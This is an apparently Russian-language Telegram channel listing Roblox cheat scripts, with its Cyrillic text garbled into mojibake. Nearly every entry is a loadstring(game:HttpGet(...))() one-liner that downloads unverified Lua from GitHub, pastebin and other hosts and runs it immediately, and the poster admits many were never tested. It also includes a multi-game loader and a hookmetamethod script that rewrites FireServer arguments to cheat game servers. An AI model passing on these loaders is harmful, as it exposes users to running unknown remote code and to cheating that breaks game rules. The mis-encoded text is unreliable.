๐‹๐ฎ๐š | ๐‘๐จ๐›๐ฅ๐จ๐ฑ | ๐’๐œ๐ซ๐ข๐ฉ๐ญ
436 subscribers
430 photos
12 videos
70 files
49 links
๐Ÿ”ฅ ะ›ัƒั‡ัˆะธะต Lua ัะบั€ะธะฟั‚ั‹ ะดะปั Roblox 2026

โ€ข 40+ ะธะณั€ (Blox Fruits, Pet Simulator, Blade Ball, Sol's RNG ะธ ะดั€.)
โ€ข ะ•ะถะตะดะฝะตะฒะฝั‹ะต ะพะฑะฝะพะฒะปะตะฝะธั
โ€ข ะ ะฐะฑะพั‡ะธะต ัะบั€ะธะฟั‚ั‹ ะฟะพัะปะต ะฟะฐั‚ั‡ะตะน
โ€ข Delta โ€ข Fluxus โ€ข Solara โ€ข Xeno

ะŸะพ ะฒะพะฟั€ะพั
Download Telegram
loadstring(game:HttpGet("https://raw.githubusercontent.com/Chris12089/atlasbss/main/script.lua"))()

56.
loadstring(game:HttpGet("https://macroware.cc/loader.lua"))()

57.
loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/d8824b23a4d9f2e0d62b4e69397d206b.lua"))()

58.
loadstring(game:GetObjects("rbxassetid://4384103988")[0X1].Source)("Pepsi Swarm")

Evade script
59.
loadstring(game:HttpGet("https://raw.githubusercontent.com/JScripter-Lua/Saturn_Open_Source/refs/heads/main/Saturn%20(Evade).lua"))()

60.
loadstring(game:HttpGet('https://raw.githubusercontent.com/Nyxarth910/Draconic-Hub-X/refs/heads/main/files/Evade/Overhaul.lua'))()

ะญะฒะพะปัŽั†ะธั ะ‘ั€ะตะนะฝั€ะพั‚ะพะฒ script
61.
--[[
WARNING: Heads up! This script has not been verified by BloxLord . Use at your own risk!
]]
loadstring(game:HttpGet("https://raw.githubusercontent.com/Chavels123/Loader/refs/heads/main/loader.lua"))()

ink game script
62.
 loadstring(game:HttpGet("https://raw.githubusercontent.com/eikikrkr-ux/bypasok/refs/heads/main/ok"))()

63.
loadstring(game:HttpGet("https://raw.githubusercontent.com/wefwef127382/inkgames.github.io/refs/heads/main/ringta.lua"))()

64.
loadstring(game:HttpGet("https://raw.githubusercontent.com/VisioneducationOfLuaCoding/Ink-Game/refs/heads/main/Ambrion"))()

65.
loadstring(game:HttpGet('https://raw.githubusercontent.com/IsThisMe01/Project-Madara/refs/heads/main/loader.lua'))();

66.
loadstring(game:HttpGet("https://raw.githubusercontent.com/eikikrkr-ux/bypasok/refs/heads/main/ok"))()

67.
loadstring(game:HttpGet("https://gitlab.com/r_soft/main/-/raw/main/LoadUB.lua"))()

Blade a Ball script
68.
loadstring(game:HttpGet("https://raw.githubusercontent.com/mzkv/LUNAR/refs/heads/main/BladeBall", true))()

Flick: Aimbot
69.
getgenv().Script = "https://api.luarmor.net/files/v3/loaders/caae3d70d980245e35f6f4e1bac98c5b.lua"
loadstring(game:HttpGet("https://raw.githubusercontent.com/abramsonhan/RScritps/refs/heads/main/rbxscript"))()


Attack on Titan script
70.
loadstring(game:HttpGet("https://raw.githubusercontent.com/raydjs/napoleonHub/refs/heads/main/src.lua"))()

71.
-- Ensure the game is loaded
if game:IsLoaded() then
print("Game is already loaded, executing script.")
else
game.Loaded:Wait()
end

local GameP = game.PlaceId

-- Function to send notifications
local function sendNotification(title, text)
game:GetService("StarterGui"):SetCore("SendNotification", {
Title = title,
Text = text,
Icon = "rbxassetid://13264701341"
})
end

-- Initial notifications
sendNotification("Notification", "Checking")
wait(0.1)
sendNotification("Notification", "Check Place Id..")
wait(0.1)

-- Game specific logic
local url

if game.PlaceId == 12137249458 then -- Gun Grounds
sendNotification("Notification", "Gun Grounds [" .. GameP .. "]")
url = "https://raw.githubusercontent.com/zerunquist/TekkitAotr/main/gungroundsffa"

elseif game.PlaceId == 5094651510 or game.PlaceId == 4855457388 then
sendNotification("Notification", "Demon Fall [" .. GameP .. "]")
url = "https://raw.githubusercontent.com/JD-04/Tekkit/main/Demon%20Fall"

elseif game.PlaceId == 13772394625 or game.PlaceId == 17757592456 or game.PlaceId == 16456370330 or game.PlaceId == 16281300371 or game.PlaceId == 15144787112 or game.PlaceId == 16581648071 or game.PlaceId == 15234596844 or game.PlaceId == 14915220621 or game.PlaceId == 15264892126 or game.PlaceId == 14732610803 then -- BladeBall
sendNotification("Notification", "Blade Ball [" .. GameP .. "]")
url = "https://raw.githubusercontent.com/JD-04/Tekkit/main/BladeBall"

elseif game.PlaceId == 2753915549 or game.PlaceId == 4442272183 or game.PlaceId == 7449423635 then
sendNotification("Notification", "Blox Fruits [" .. GameP .. "]")
url = "https://raw.githubusercontent.com/JD-04/Tekkit/refs/heads/main/Blox%20obf.txt"

elseif game.PlaceId == 286090429 then
sendNotification("Notification", "Arsenal [" .. GameP .. "]")
url = "https://raw.githubusercontent.com/JD-04/Tekkit/refs/heads/main/Arsenal"
-- Add other games here as needed

else
sendNotification("Notification", "Loading Aot:R Hub [" .. GameP .. "]")
url = "https://api.luarmor.net/files/v3/loaders/705e7fe7aa288f0fe86900cedb1119b1.lua"
end

-- Load and execute the script from the URL
if url then
local success, response = pcall(function()
return game:HttpGet(url)
end)

if success then
loadstring(response)()
else
sendNotification("Error", "Failed to load script from URL: " .. url)
end
else
sendNotification("Error", "No URL found for the current game.") -- h
end

UNIVERSAL SCRIPT
72.
loadstring(game:HttpGet("https://raw.githubusercontent.com/yoursvexyyy/TROLL-SCRIPTS/refs/heads/main/jerk%20off%2Bfly"))()

73.
loadstring(game:HttpGet("https://raw.githubusercontent.com/Klinac/scripts/main/utopia_spy.lua", true))()

74.
loadstring(game:HttpGet("https://raw.githubusercontent.com/FOGOTY/super-script-all-games-roblox/main/script"))()

King Legacy SCRIPT
75.
loadstring(game:HttpGet("https://raw.githubusercontent.com/Tsuo7/TsuoHub/main/king%20legacy"))()

76.
loadstring(game:HttpGetAsync("https://lua-library.btteam.net/script-auth.txt"))()

77.
loadstring(game:HttpGet("https://cracklua.github.io/cracks/arc"))() 

War Tycoon SCRIPT
78.
getgenv().Skip = true --values of 'true' and 'false'
getgenv().AntiAfk = false -- values of 'true' and 'false'
getgenv().Script = "https://pastebin.com/raw/gf22x6st"

loadstring(game:HttpGet("https://raw.githubusercontent.com/abramsonhan/RScritps/refs/heads/main/rbxscript"))()


79.
loadstring(game:HttpGet("https://raw.githubusercontent.com/Juanko-Scripts/OPEN-SOURCE/refs/heads/main/PANEL%20WAR"))()

80.
loadstring(game:HttpGet("https://thebasement.ink/BSMT"))()

Doors script
81.
loadstring(game:HttpGet("https://raw.githubusercontent.com/DiosDi/VexonHub/refs/heads/main/VexonHub"))()

82.
 loadstring(game:HttpGet("https://raw.githubusercontent.com/JScripter-Lua/Saturn_Hub_Products/refs/heads/main/Saturn_Hub_Doors.lua"))() 

83.
loadstring(game:HttpGet("https://raw.githubusercontent.com/Qiwikox12/stubrawl/refs/heads/main/DoorsHardcore.txt"))()

84.
loadstring(game:HttpGet("https://raw.githubusercontent.com/KINGHUB01/BlackKing-obf/main/Doors%20Blackking%20And%20BobHub"))()

85.
loadstring(game:HttpGet("https://astral.gay/loader.luau"))()

86.
loadstring(game:HttpGet("https://raw.githubusercontent.com/NuIlFire/NullFire/main/loader.lua"))()

PRESSURE SCRIPT
87.
loadstring(game:HttpGet("https://raw.githubusercontent.com/Nivex123456/main/refs/heads/main/Loader.lua"))()

88.
loadstring(game:HttpGet('https://raw.githubusercontent.com/SpiderScriptRB/Pressure/refs/heads/main/Protected_1550309234935669.txt'))()

89.
loadstring(game:HttpGet('https://raw.githubusercontent.com/InfernusScripts/Fire-Hub/main/Loader'))()
Animal Simulator SCRIPT
90.
loadstring(game:HttpGet("https://api.junkie-development.de/api/v1/luascripts/public/fcef5e88349466d80f524cc610f4695e69e71d6153048167c52c59ea7e7e4167/download"))()
Hunty Zombie SCRIPT
91.
loadstring(game:HttpGet("https://raw.githubusercontent.com/AhmadV99/Speed-Hub-X/main/Speed%20Hub%20X.lua", true))()
Lifting Simulator SCRIPT
92.
loadstring(game:HttpGet("https://pastebin.com/raw/tDS58RkZ", true))()
Weight Lifting Simulator script
93.
local hook
hook = hookmetamethod(game, "__namecall", newcclosure(function(self, ...)
local args = {...}


if #args >= 2 and
type(args[1]) == "string" and
type(args[2]) == "number" then


pcall(function()

if getnamecallmethod() == "FireServer" and
not checkcaller() and
#args[1] > 20 then


local newValue = 10000000


if newValue > 0 and newValue <= math.pow(2, 53) then
args[2] = newValue
end
end
end)
end

return hook(self, unpack(args))
end))

94.
lifting simulator script
loadstring(game:HttpGet("https://raw.githubusercontent.com/BinaryHubOfficial/binaryhub/main/init.lua"))()
95.
Stumble Buddies script
loadstring(game:HttpGet("https://raw.githubusercontent.com/kodescripts/scripts/main/stumble-buddies-admin.lua", true))()
96.
Universal Hub script
loadstring(game:HttpGet("https://raw.githubusercontent.com/Davicoderliner/davi-hub-V2.3/main/davi.lua",true))()
97.
blox fruits script
loadstring(game:HttpGet("https://raw.githubusercontent.com/LuaCrack/Min/refs/heads/main/MinXt2Eng"))()
98.
Universal script
_G.Search = "info" -- for all functions put "all"

loadstring(game:HttpGet("https://raw.githubusercontent.com/RiseValco/Executor-Function-Searcher/main/finder.lua"))()

99.
Steal a brainrots script
loadstring(game:HttpGet("https://raw.githubusercontent.com/tienkhanh1/spicy/main/Chilli.lua"))()
100.
ะŸั€ะธะฒะฐั‚ ะฒ Steal a brainrots script
loadstring(game:HttpGet('https://raw.githubusercontent.com/nootmaus/IceHubServer/refs/heads/main/Private'))()
ะะต ั‚ะตัั‚ะธะป
ะšะฐั€ะพั‡ะต ั‚ะฐะผ ะพัˆะธะฑะบะฐ ั‚ะฐะผ 200 ะฝัƒ ะบะฐั€ะพั‡ะต ั‚ัƒั‚ 100 ัะบั€ะธะฟั‚ะพะฒ 200 ะฝะต ัะผะพะณ ะพัะธะปะธั‚ัŒ
ะะฐ ัะตะณะพะดะฝั ะฒัะต ั‚ะฐะผ ะตัั‚ัŒ ะฝะต ั€ะฐะฑะพั‡ะธะต ัะบั€ะธะฟั‚ั‹ ะธ ั€ะฐะฑะพั‡ะธะต ั ั…ะท ั ะฝะต ะฒัะต ั‚ะตัั‚ะธะป ะผะพะณัƒ ัะบะฐะทะฐั‚ัŒ ะฝะพ ะปะฐะดะฝะพ ะตัะปะธ ะฒะฐะผ ะฝะฐะดะพ ัะดะตะปะฐั‚ัŒ ะบะปัŽั‡ ะฒะพั‚ ะฟะธัˆะธั‚ะต ะผะฝะต
@MRLua_RBX
1
ะ”ะพะฑั€ะพะต ัƒั‚ั€ะพ
ะะฐ ั‡ั‚ะพ ัะบั€ะธะฟั‚ั‹
Steal a Brainrot
script
loadstring(game:HttpGet("https://raw.githubusercontent.com/LucasggkX/Games/refs/heads/main/Auto%20Fishing.lua"))()

๐Ÿ“จ ะะฒั‚ะพ ะปะพะฒะปั ะฑั€ัะนะฝั€ะพั‚ะพะฒ
script privat
loadstring(game:HttpGet('https://raw.githubusercontent.com/nootmaus/IceHubServer/refs/heads/main/Private'))()

Script
loadstring(game:HttpGet('https://raw.githubusercontent.com/nootmaus/IceInvisible/refs/heads/main/.lua'))()
SCRIPT ะกะžะ—ะ”ะะ•ะข ะ’ะ˜ะŸะšะฃ ะะ ะ’ะกะ• ะ ะ•ะ–ะ˜ะœะ˜
loadstring(game:HttpGet("https://raw.githubusercontent.com/GalacticScripts/Galactic-Hub/refs/heads/main/WindUI"))()

ะะ• ะขะ•ะกะขะ˜ะ›
This media is not supported in your browser
VIEW IN TELEGRAM
๐Ÿ“จ ะŸะฐะฝะตะปัŒ ะฐะดะผะธะฝะฐ ะฑะตัะฟะปะฐั‚ะฝะพ
โ”” ะ˜ะผะฑะฐ ัะบั€ะธะฟั‚

key="YeOncCj5ttjk"

loadstring(game:HttpGet("https://pastefy.app/McsTgBfK/raw"))()

ะะต ั‚ะตัั‚ะธะป
ะ”ะพะฑั€ะพะต ัƒั‚ั€ะพ ะฝะฐ ั‡ั‚ะพ ัะบั€ะธะฟั‚ั‹
Trident Survival
script
1.
loadstring(game:HttpGet("https://api.junkie-development.de/api/v1/luascripts/public/fd97ed92f5599079021cb6cf381eecdc134163f7259587d4ba0fd35a789071dd/download"))()

ั‚ัƒั‚ ะตัั‚ัŒ ะบะปัŽั‡ ะฝะพ ั€ะฐะฑะพั‚ะฐะตั‚ ะžั‚ะปะธั‡ะฝะพ ะผะพะณัƒ ัะดะตะปะฐั‚ัŒ ะบะปัŽั‡ ั
@MRLua_RBX
Steal a Brainrot
script
loadstring(game:HttpGet("https://raw.githubusercontent.com/tienkhanh1/spicy/main/Chilli.lua"))()

๐Ÿ“จ ะงะธะปะธ ะฟั€ะตะผะธัƒะผ
๐Ÿฆฅ ะฐะฒั‚ะพ ั„ั€ัƒะบั‚ั‹ ะธ ะบะพะฝั„ะตั‚ั‹ ะฑะปะพะบั ั„ั€ัƒั‚ั
script
loadstring(game:HttpGet("https://raw.githubusercontent.com/AAwful/Vector_Hub/0/v2"))()
๐Ÿ“จ ะŸะฐะฝะตะปัŒ ะดะถะตะฝะดะปะฐ
loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/d0a2d025f5e63d3f369e2e3fe33b872a.lua"))()
ัƒั€ะฐ ะฒัะตะผ ัะฟะฐัะธะฑะพ ะทะฐ 100 ัะฐะฑะพะฒ
ะฝะฐ ั‡ั‚ะพ ัะบั€ะธะฟั‚ั‹
๐Ÿ‘4